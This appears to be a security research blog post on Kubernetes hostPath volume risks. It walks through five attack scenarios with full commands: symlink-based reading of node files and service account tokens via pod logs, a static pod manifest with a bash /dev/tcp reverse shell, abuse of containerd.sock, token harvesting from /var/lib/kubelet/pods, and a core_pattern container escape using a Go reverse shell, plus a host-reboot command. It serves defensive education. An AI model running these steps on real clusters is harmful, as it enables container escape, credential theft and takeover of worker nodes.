
In today's cloud technology landscape, Kubernetes is widely used to orchestrate containerized applications, handling their deployment, scaling, and management. Applications in a Kubernetes environment benefit from high availability and resource efficiency, which makes Kubernetes well suited to cloud-native development. However, container filesystems are ephemeral: data written inside a container can be lost or become inconsistent when the container is restarted or modified. Applications that rely on stable, persistent data therefore need additional storage solutions. One example of a native solution in Kubernetes is the hostPath volume.

With the help of the hostPath functionality, a pod can access the storage components of the worker node by mounting a file or directory from the filesystem of the node where it is running.

While offering a convenient way of accessing the filesystem of the worker node, hostPath functionality can also open the door to serious security risks. In this blog we will shed light on these potential risks, delving into the depths of risky hostPath use cases and how they can compromise the security of your cluster if not carefully managed.

The hostPath volume type is relatively common, and cloud providers use it widely to share data between worker nodes and the pods running on them.



In AKS, for instance, the ama-logs pod, which collects logs from containers, mounts the node's entire filesystem when Container Insights is enabled on a cluster.

A hostPath volume is declared in .spec.volumes of the pod's specification. It can then be bound to the relevant containers in .spec.containers[*].volumeMounts.

The Kubelet, the node agent running on each worker node, uses the watch mechanism to observe changes to Pod resources on the API server, so it is notified when a pod that includes a hostPath declaration is deployed to its node.

The Kubelet then inspects the Pod definition and instructs the container runtime to mount the required path specified in the pod’s specification from the node filesystem. The container runtime then starts the container with the relevant directories mounted.

Defining a hostPath without being careful and fully understanding the impact of the specific path can pose a security risk. Kubernetes provides the following warning in their documentation for when users apply hostPath:

To better explain the risk, the following section presents five attack scenarios that take advantage of risky hostPath configurations. Each scenario includes the required prerequisites, instructions for setting up a vulnerable environment, the potential impact, and a detailed walkthrough with complete instructions to simulate and exploit the use case.

/var/log directory mounted

Prerequisites:
- /var/log host path directory mounted to a pod
- GET RBAC permissions to the pods/log sub-resource in the core API group
- GET & LIST RBAC permissions to the pods/log & nodes/log sub-resources in the core API group

The purpose of the /var/log directory is simply to store log files. From the Kubernetes perspective, it is where the Pod log files for containers are stored on the nodes. An attacker can abuse this directory by creating symbolic links to sensitive files on the host and then making the Kubelet read them, by requesting the pod's logs with kubectl or through an API call. This can be used to escape from the pod to the worker node in many ways, including reading SSH private keys, cracking /etc/shadow hashes, and reading configuration files. Here we will focus on the /var/lib/kubelet/pods directory, which is discussed further later in this blog.

In this scenario, we will demonstrate how an attacker can abuse a writable /var/log directory mounted to a pod to obtain the service account tokens stored in the /var/lib/kubelet/pods directory. Later we will explain how those tokens can be used by an attacker.

Kubernetes stores the service account token mounted into each pod in the /var/lib/kubelet/pods directory, following this structure:

{podUID}/volumes/kubernetes.io~projected/kube-api-access-{random suffix}/token

- podUID, namespace, and pod name can be obtained from the /var/log/pods directory, whose entries are named <namespace>_<pod_name>_<pod_uuid>.
- kube-api-access-{random suffix}: the random suffix consists of 5 alphanumeric characters taken from the following list: bcdfghjklmnpqrstvwxz2456789 (src).

It is therefore possible to assemble the entire path of the token using a brute-force technique.
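A quick calculation shows why brute force is practical here. The alphabet above has 27 characters (20 consonants and 7 digits), so a 5-character suffix has 27^5 = 14,348,907 possible values per pod. The Go sketch below computes this keyspace and checks whether a volume name matches the kube-api-access-{suffix} format; the helper names are ours and are only for illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// Alphabet of the random suffix, as quoted above.
const alphabet = "bcdfghjklmnpqrstvwxz2456789"

const (
	prefix    = "kube-api-access-"
	suffixLen = 5
)

// keyspace returns len(alphabet)^suffixLen: the candidate suffixes per pod UID.
func keyspace() int {
	n := 1
	for i := 0; i < suffixLen; i++ {
		n *= len(alphabet)
	}
	return n
}

// isProjectedTokenVolume reports whether name has the kube-api-access- prefix
// followed by exactly suffixLen characters drawn only from the alphabet.
func isProjectedTokenVolume(name string) bool {
	if !strings.HasPrefix(name, prefix) {
		return false
	}
	suffix := name[len(prefix):]
	if len(suffix) != suffixLen {
		return false
	}
	for _, r := range suffix {
		if !strings.ContainsRune(alphabet, r) {
			return false
		}
	}
	return true
}

func main() {
	fmt.Println(keyspace())                                      // 14348907
	fmt.Println(isProjectedTokenVolume("kube-api-access-x7k2p")) // true
	fmt.Println(isProjectedTokenVolume("kube-api-access-abcde")) // false: 'a' and 'e' are not in the alphabet
}
```

Since the pod UID is already known from /var/log/pods, the suffix is the only unknown part of the token path, so the search space per pod is exactly this keyspace.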

We have developed an automated tool, written in Go, that can be deployed on a specified pod which mounts the /var/log hostPath directory. This tool can function using either the service account token from the pod on which it is running or a token supplied by the user. First, the tool lists all of the namespaces in the /var/log/pods directory in order to determine if the service account that is provided has the permissions necessary to read the logs in any of those namespaces. It then creates symlinks for all possible suffix combinations using a brute-force method to find service account tokens stored in the /var/lib/kubelet/pods directory on the host node.

For further information on how to use the tool, source code, and more, please see the link below:

https://github.com/ReemRotenberg/k8s-token-hunter

Please note, the tool should not be used in production environments.

Figure 2 shows usage of the k8s-token-hunter tool.

Disclaimer: The use of the code provided herein is intended solely for educational and security-testing purposes on systems where you have explicit authorization to conduct such activities. Misuse of this code to access, modify, or exploit systems without proper consent is strictly prohibited and may violate privacy laws, data protection statutes, and ethical standards. It is the user's responsibility to ensure lawful and ethical application of this tool. The creators and distributors of the code assume no liability for any unauthorized or improper use of the code, and are not responsible for any direct or indirect damages or legal repercussions that may arise from such misuse. Please use this code responsibly and ethically.

```bash
# create new namespace
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: hostpath-ns
EOF

# service account
kubectl apply -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
  name: sa-get-logs
  namespace: hostpath-ns
EOF

# role
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: hostpath-ns
  name: get-logs-role
rules:
- apiGroups: [""]
  resources: ["pods/log"]
  verbs: ["get"]
EOF

# role binding
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: get-logs-role-binding
  namespace: hostpath-ns
subjects:
- kind: ServiceAccount
  name: sa-get-logs
  namespace: hostpath-ns
roleRef:
  kind: Role
  name: get-logs-role
  apiGroup: rbac.authorization.k8s.io
EOF

# long-lived token for the service account
# (the Secret must be in the same namespace as the service account)
kubectl apply -f - <<EOF
apiVersion: v1
kind: Secret
type: kubernetes.io/service-account-token
metadata:
  name: sa-get-logs-secret
  namespace: hostpath-ns
  annotations:
    kubernetes.io/service-account.name: sa-get-logs
EOF

# pod with the node's /var/log mounted
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: var-log-pod
  namespace: hostpath-ns
spec:
  serviceAccountName: sa-get-logs
  containers:
  - name: var-log-container
    image: ubuntu:latest
    command: ["/bin/sh", "-c"]
    args: ["apt-get update && apt-get install -y curl && curl -LO https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl && install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl && sleep 999h"]
    volumeMounts:
    - name: host-var-log
      mountPath: /host/var/log
  volumes:
  - name: host-var-log
    hostPath:
      path: /var/log
EOF
```

1. Accessing /etc/passwd content of the worker node

Get a shell on the running pod: `kubectl exec -it -n hostpath-ns var-log-pod -- /bin/bash`

```bash
# check permissions to read logs in the 'hostpath-ns' namespace
/usr/local/bin/kubectl auth can-i get pods --subresource=log --namespace=hostpath-ns

# go to the log directory of a container in the 'hostpath-ns' namespace
cd /host/var/log/pods/hostpath-ns_<pod_name>_<pod_uuid>/<container_name>/

# replace the last log file in the current directory with a symlink to /etc/passwd
ln -sf /etc/passwd ./<last_log_file>.log
```

Get the pod's log content:

```bash
# use kubectl to get the pod's log
# set --tail to the number of lines desired
kubectl logs -n hostpath-ns <pod_name> --tail=1

# or with curl
curl -i -k -H "Authorization: Bearer $TOKEN" 'https://<cluster IP>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container_name>'
```

2. Accessing service account token stored on the worker node

Get a shell on the running pod: `kubectl exec -it -n hostpath-ns var-log-pod -- /bin/bash`

```bash
# check permissions to read logs in the 'hostpath-ns' namespace
/usr/local/bin/kubectl auth can-i get pods --subresource=log --namespace=hostpath-ns

# go to the log directory of a container in the 'hostpath-ns' namespace
cd /host/var/log/pods/hostpath-ns_<pod_name>_<pod_uuid>/<container_name>/

# create a symlink to the token of a pod found in /var/log/pods, using the path below
# the 5-character suffix (xxxxx) has to be found by brute force
ln -sf /var/lib/kubelet/pods/<pod_uuid>/volumes/kubernetes.io~projected/kube-api-access-xxxxx/token ./<last_log_file>.log
```

Get the pod's log content:

```bash
# use kubectl to get the pod's log
# set --tail to the number of lines desired
kubectl logs -n hostpath-ns <pod_name> --tail=1

# or with curl
curl -i -k -H "Authorization: Bearer $TOKEN" 'https://<cluster IP>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container_name>'
```

/etc/kubernetes/manifests directory mounted

Prerequisites:
- /etc/kubernetes/manifests host path directory mounted to a pod

The purpose of the /etc/kubernetes/manifests directory is to store Static Pod manifests. Static Pods are pods that are managed directly by the Kubelet. According to the Kubernetes documentation, the main use for static pods is to run a self-hosted control plane. The Kubelet watches this directory for changes and instructs the container runtime to create or delete containers accordingly.

It is also worth mentioning that a static pod's spec cannot refer to other API objects (e.g., ServiceAccount, ConfigMap, Secret).



In this scenario, we will demonstrate how an attacker can abuse a writable /etc/kubernetes/manifests directory mounted to a pod to deploy pods on a worker node.

Deploying static pods is simple: write a static pod manifest into /etc/kubernetes/manifests, and the Kubelet takes care of the rest. A new static pod is created, and a mirror pod* should appear on the Kubernetes API server.

*According to the Kubernetes documentation, a mirror pod is a pod object that the Kubelet uses to represent a static pod.

When the Kubelet finds a static pod in its configuration, it automatically tries to create a Pod object on the Kubernetes API server for it. This means that the pod will be visible on the API server, but cannot be controlled from there.

For example, deleting a mirror pod does not stop the Kubelet from running the static pod.

Because static pods are created and managed by the Kubelet, an attacker may be able to evade detection and bypass prevention mechanisms. For example, an attacker could deploy a static pod in the kube-system namespace, evade API logging, and bypass admission controls.



We deployed static pods using this method on the three major managed Kubernetes services: AKS (Azure), GKE (Google), and EKS (Amazon Web Services). On AKS and GKE, the static pods were created by the Kubelet and mirror pods appeared on the API server.

However, on EKS some changes to the Kubelet configuration file (/etc/kubernetes/kubelet/kubelet-config.json) are required, as well as a restart of the Kubelet service, so static pods can only be deployed on a node the attacker has already accessed. In this case, the technique is mainly useful for persistence. It is also worth noting that when static pods are deployed to the kube-system namespace on EKS, they are not mirrored on the API server, which makes this approach even stealthier.
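Whether a node accepts static pods from disk is controlled by the Kubelet configuration. In the `KubeletConfiguration` file format, the relevant field is `staticPodPath`; when it is empty, the Kubelet does not read a manifest directory (the deprecated `--pod-manifest-path` flag can also set it, so the Kubelet's command line is worth checking too). The Go sketch below reads a JSON Kubelet configuration, such as the EKS file mentioned above, and reports the configured path. It decodes only this one field and is meant as an auditing aid, not a full configuration parser.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
)

// Only the field we care about from the KubeletConfiguration schema.
type kubeletConfig struct {
	StaticPodPath string `json:"staticPodPath"`
}

// staticPodPath returns the configured manifest path, or "" if it is not set in the file.
func staticPodPath(data []byte) (string, error) {
	var cfg kubeletConfig
	if err := json.Unmarshal(data, &cfg); err != nil {
		return "", err
	}
	return cfg.StaticPodPath, nil
}

func main() {
	// Default to the EKS location mentioned above; pass another file as the first argument.
	file := "/etc/kubernetes/kubelet/kubelet-config.json"
	if len(os.Args) > 1 {
		file = os.Args[1]
	}
	data, err := os.ReadFile(file)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		return
	}
	p, err := staticPodPath(data)
	if err != nil {
		fmt.Fprintln(os.Stderr, "cannot parse config:", err)
		return
	}
	if p == "" {
		fmt.Println("staticPodPath is not set in", file)
	} else {
		fmt.Println("static pods are read from", p)
	}
}
```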

```bash
# create new namespace
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: hostpath-ns
EOF

# manifests-pod yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: manifests-pod
  namespace: hostpath-ns
spec:
  containers:
  - name: manifests-container
    image: ubuntu:latest
    command: ["/bin/sh", "-c"]
    args: ["sleep 1h"]
    volumeMounts:
    - name: host-manifests
      mountPath: /host/etc/kubernetes/manifests
  volumes:
  - name: host-manifests
    hostPath:
      path: /etc/kubernetes/manifests
EOF
```

The following code will be used in step 4:

```bash
# static pod manifest
# change the IP and port to match the netcat listener
cat <<EOF > /host/etc/kubernetes/manifests/pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: evil-static-pod
  namespace: kube-system
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: ubuntu-container
    image: ubuntu:latest
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
    command: ["bash", "-c"]
    args: ["bash -i >& /dev/tcp/<manifest's pod IP address>/<PORT> 0>&1"]
  volumes:
  - name: host
    hostPath:
      path: /
EOF
```

Optional: install crictl

```bash
VERSION="v1.28.0"
wget https://github.com/kubernetes-sigs/cri-tools/releases/download/$VERSION/crictl-$VERSION-linux-amd64.tar.gz
sudo tar zxvf crictl-$VERSION-linux-amd64.tar.gz -C /usr/local/bin
rm -f crictl-$VERSION-linux-amd64.tar.gz
```

In the following simulation, we'll use a running pod that has the /etc/kubernetes/manifests host path mounted on it to move laterally into the worker node.

1. Get a shell on the running pod: `kubectl exec -it -n hostpath-ns manifests-pod -- /bin/bash`
2. Find the manifests-pod pod's IP address.
3. Start a netcat listener on the manifests-pod pod.
4. Write the static pod manifest shown above into the /host/etc/kubernetes/manifests mounted directory.
5. Once the reverse shell connects, use the nsenter command with --target 1 --all to enter the host namespaces, or just chroot to the node mounted directory /host.
6. List the containers running on the node with the crictl ps command.



Figure 3 shows catching the reverse shell from the evil static pod on the manifests-pod pod.

Figure 4 shows the creation of a new static pod on AKS.

/var/run/containerd/containerd.sock socket mounted

Prerequisites:
- /var/run/containerd/containerd.sock socket (or another applicable container runtime socket, such as CRI-O's or Docker's) mounted to a pod
- spec.hostNetwork set to true (in order to attach to a running container or exec commands in it)

Containerd is a container runtime that is responsible for managing the lifecycle of containers on a host. In Kubernetes, it runs as a daemon on worker nodes. /run/containerd/containerd.sock is a UNIX domain socket that the containerd daemon uses for communication. A UNIX domain socket, or IPC (inter-process communication) socket, is a data communications endpoint for exchanging data between processes on the same host.



In this scenario, we’ll demonstrate how an attacker can abuse the containerd.sock socket mounted on a pod by interacting with the containerd daemon running on a worker node.

We'll use crictl to communicate with containerd.sock. Since the socket is already mounted, this is straightforward: crictl can be used to stop running containers, execute commands, and obtain sensitive information.

Setting spec.hostNetwork to true is required to execute commands in, or attach to, a running container.

```bash
# create new namespace
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: hostpath-ns
EOF

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: cr-containerd-pod
  namespace: hostpath-ns
spec:
  # hostNetwork: true   # uncomment for the crictl exec/attach scenario
  containers:
  - name: cr-containerd
    image: ubuntu:latest
    command: ["/bin/sh", "-c"]
    args: ["apt-get update && apt-get install -y curl && curl -L https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.0/crictl-v1.26.0-linux-amd64.tar.gz --output crictl-v1.26.0-linux-amd64.tar.gz && tar zxvf crictl-v1.26.0-linux-amd64.tar.gz -C /usr/local/bin && sleep 1h"]
    volumeMounts:
    - name: host-var-run-containerd
      mountPath: /host/containerd/containerd.sock
  volumes:
  - name: host-var-run-containerd
    hostPath:
      path: /var/run/containerd/containerd.sock
      type: Socket
EOF
```

From inside the running pod, execute the crictl ps command to list all the running containers (and the IDs of their pods) on the worker node:

```bash
/usr/local/bin/crictl --runtime-endpoint /host/containerd/containerd.sock ps
```

Then, execute the stopp command to stop a running pod:

```bash
# <pod_id> is shown in the POD ID column of crictl ps
/usr/local/bin/crictl --runtime-endpoint /host/containerd/containerd.sock stopp <pod_id>
```

Figure 5 shows stopping a running pod with the crictl stopp command via the mounted containerd.sock.

From inside a running pod that has containerd.sock mounted and hostNetwork set to true, execute the crictl ps command to list all the running containers on the worker node:

```bash
/usr/local/bin/crictl --runtime-endpoint /host/containerd/containerd.sock ps
```

Then, execute crictl exec to run commands in a running container:

```bash
/usr/local/bin/crictl --runtime-endpoint /host/containerd/containerd.sock exec -it <container_id> <command>
```

Figure 6 shows communication with the containerd daemon via the containerd.sock socket mounted to a Pod.

/var/lib/kubelet/pods directory mounted

Prerequisites:
- /var/lib/kubelet/pods host path directory mounted to a pod

The /var/lib/kubelet/pods directory in Kubernetes is used by the Kubelet to store data related to the pods running on that specific node.

This directory includes a subdirectory for each pod running on the node, under /var/lib/kubelet/pods. The directory name is the UUID of the pod.

In this scenario, we'll demonstrate how an attacker that has access to the /var/lib/kubelet/pods host path directory can potentially escalate its privileges and move laterally in the cluster.

Because this directory holds the volumes mounted into each pod, including secrets, it also contains the service account tokens of every pod running on the host. An attacker can enumerate these tokens and map their RBAC permissions. Additionally, an attacker will search for other secrets and configmaps that may expose sensitive information.

```bash
# create new namespace
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: hostpath-ns
EOF

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: var-lib-kubelet-pods-pod
  namespace: hostpath-ns
spec:
  containers:
  - name: cr-var-lib-kubelet-pods
    image: ubuntu:latest
    command: ["/bin/sh", "-c"]
    args: ["apt-get update && apt-get install -y curl && curl -LO https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl && install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl && sleep 1h"]
    volumeMounts:
    - name: host-var-lib-kubelet-pods
      mountPath: /host/var/lib/kubelet/pods
  volumes:
  - name: host-var-lib-kubelet-pods
    hostPath:
      path: /var/lib/kubelet/pods
      type: Directory
EOF
```

1. From inside a running Pod that has the /var/lib/kubelet/pods directory mounted, cd into the different directories under /host/var/lib/kubelet/pods and extract the tokens and other sensitive information stored there.



2. Check the RBAC permissions for each service account:

```bash
export TOKEN=$(cat /host/var/lib/kubelet/pods/<pod_uuid>/volumes/kubernetes.io~projected/kube-api-access-<random-suffix>/token)
kubectl auth can-i --list --token="$TOKEN"
```

3. Here we can see that we have found a token for the 'gatekeeper-admin' service account, which exists by default on AKS clusters. Inspecting its RBAC permissions shows that it has the get, list, and watch verbs granted for "*" resources in the "*" API group, meaning read access to all resources in all API groups.



4. By using the gatekeeper-admin service account token, it is possible to read secrets across all namespaces in the cluster.

Figure 7 shows access to sensitive information stored in /var/lib/kubelet/pods mounted on a running Pod.

Figure 8 shows gatekeeper’s RBAC permissions.

Figure 9 shows a secret stored in the kube-system namespace, extracted using gatekeeper's service account token.



/proc/sys/kernel/core_pattern file mounted

Prerequisites:
- /proc/sys/kernel/core_pattern host path file mounted to a pod

The /proc directory is a Linux virtual file system whose files provide access to kernel information and settings; some of them also allow kernel variables to be modified by writing to them.

/proc/sys/kernel/core_pattern is a file in the proc filesystem on Linux systems that specifies the pattern for the filename and location of core dump files. When a program terminates on certain signals (listed in Appendix A), e.g., when it crashes, it produces a core dump file that stores the memory image of the process at the time of termination.

From the Linux core(5) manual, "Piping core dumps to a program":

> Since Linux 2.6.19, Linux supports an alternate syntax for the /proc/sys/kernel/core_pattern file. If the first character of this file is a pipe symbol (|), then the remainder of the line is interpreted as the command-line for a user-space program (or script) that is to be executed.

Per the same manual page, this program runs as root and in the initial (host) namespaces rather than in those of the crashing process. Accordingly, it is possible to trigger command execution on the worker node by editing the host's /proc/sys/kernel/core_pattern file and then causing a program to crash.

For more information follow the link below:

https://pwning.systems/posts/escaping-containers-for-fun/

In this scenario, we'll demonstrate how an attacker with write access to the /proc/sys/kernel/core_pattern host path file can break out of the container into the worker node.

```bash
# create new namespace
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: hostpath-ns
EOF

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: proc-sys-kernel-core-pattern-pod
  namespace: hostpath-ns
spec:
  containers:
  - name: proc-sys-kernel-core-pattern-container
    image: ubuntu:latest
    command: ["/bin/sh", "-c"]
    args: ["apt-get update && apt-get install -y golang-go && apt-get install -y ncat && apt-get install -y net-tools && apt-get install -y vim && apt-get install -y curl && curl -LO https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl && install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl && sleep 1h"]
    volumeMounts:
    - name: host-proc-sys-kernel-core-pattern
      mountPath: /host/proc/sys/kernel/core_pattern
  volumes:
  - name: host-proc-sys-kernel-core-pattern
    hostPath:
      path: /proc/sys/kernel/core_pattern
      type: File
EOF
```

1. Get a shell on the running pod: `kubectl exec -it -n hostpath-ns proc-sys-kernel-core-pattern-pod -- /bin/bash`

2. Find the proc-sys-kernel-core-pattern-pod pod’s IP address.

3. Create a new file called 'reverse.go' under the /tmp directory on the running Pod:

```go
// reverse.go
// change <IP> and <PORT>
package main

import (
	"net"
	"os/exec"
	"time"
)

func main() {
	reverse("<IP>:<PORT>")
}

func reverse(host string) {
	c, err := net.Dial("tcp", host)
	if nil != err {
		if nil != c {
			c.Close()
		}
		time.Sleep(time.Minute)
		reverse(host)
		return // do not fall through with a nil connection
	}
	cmd := exec.Command("/bin/bash")
	cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c
	cmd.Run()
	c.Close()
	reverse(host)
}

// Source: https://gist.github.com/yougg/b47f4910767a74fcfe1077d21568070e
```

4. Create another file called 'crash.go', also under the /tmp directory:

```go
// crash.go
package main

import (
	"fmt"
	"os"
	"os/signal"
	"syscall"
)

func main() {
	// Create a channel to receive signals
	sigChan := make(chan os.Signal, 1)
	// Notify the channel on SIGABRT
	signal.Notify(sigChan, syscall.SIGABRT)
	// Simulate work
	go func() {
		fmt.Println("Working...")
	}()
	// Block until a signal is received
	sig := <-sigChan
	fmt.Printf("Got signal: %v, aborting...\n", sig)
}
```

5. Compile /tmp/reverse.go and /tmp/crash.go, writing the binaries to /tmp (by default, go build writes them to the current directory):

```bash
go build -o /tmp/reverse /tmp/reverse.go
go build -o /tmp/crash /tmp/crash.go
```

6. Find the OverlayFS path of the running container by executing:

```bash
overlay=`mount | sed -n 's/.*\perdir=\([^,]*\).*/\1/p'`
```

7. Edit the /proc/sys/kernel/core_pattern file, using a pipe and the path to the reverse binary we created earlier:

```bash
echo "|$overlay/tmp/reverse" > /host/proc/sys/kernel/core_pattern
```

8. Now, all that's left is to execute a program that will crash and have a listener ready to catch the reverse shell:

```bash
sleep 5 && /tmp/crash &
nc -nlvp 9911
```

/ directory mounted

When the entire file system is mounted with write permissions using hostPath, all of the scenarios described above obviously apply as well. The root mount also exposes further paths that could lead to security risks and that this blog does not cover. Some examples of risky hostPath mounts are:

- The /root host path directory gives the container access to sensitive files like /root/.ssh/authorized_keys.
- The /etc host path directory gives the container access to configuration files stored on the worker node.
- /proc and /sys could allow an attacker to modify kernel variables and access sensitive data, and could potentially lead to container escape. For example, mounting the /proc/sysrq-trigger file allows an attacker to reboot the host simply by writing to it:

```bash
# payload -> execute from a running pod that has the /proc/sysrq-trigger host path mounted to it
echo b > /proc/sysrq-trigger # Reboots the host
```

- The /etc/kubernetes/pki directory contains the private keys and certificates used for TLS communication, such as between the Kubelet and the API server.

While Kubernetes has proven to be a powerful tool for container orchestration, it does have certain risks to consider. In this blog, we aimed to shed some light on the security risks the hostPath mount presents in a cluster. By understanding these risky paths and implementing security measures, organizations can effectively leverage the power of Kubernetes while minimizing potential threats.

Appendix A: signals whose default action is to terminate the process and dump core (from signal(7); P1990 = POSIX.1-1990, P2001 = POSIX.1-2001)

| Signal | Standard | Action | Comment |
|---|---|---|---|
| SIGABRT | P1990 | Core | Abort signal from abort(3) |
| SIGBUS | P2001 | Core | Bus error (bad memory access) |
| SIGFPE | P1990 | Core | Floating-point exception |
| SIGILL | P1990 | Core | Illegal Instruction |
| SIGIOT | - | Core | IOT trap. A synonym for SIGABRT |
| SIGQUIT | P1990 | Core | Quit from keyboard |
| SIGSEGV | P1990 | Core | Invalid memory reference |
| SIGSYS | P2001 | Core | Bad system call (SVr4); see also seccomp(2) |
| SIGTRAP | P2001 | Core | Trace/breakpoint trap |
| SIGUNUSED | - | Core | Synonymous with SIGSYS |
| SIGXCPU | P2001 | Core | CPU time limit exceeded (4.2BSD); see setrlimit(2) |
| SIGXFSZ | P2001 | Core | File size limit exceeded (4.2BSD); see setrlimit(2) |

https://kubernetes.io/docs/concepts/storage/volumes/#hostpath

https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/

https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/

https://pwning.systems/posts/escaping-containers-for-fun/

https://man7.org/linux/man-pages/man5/core.5.html

https://www.aquasec.com/blog/kubernetes-security-pod-escape-log-mounts/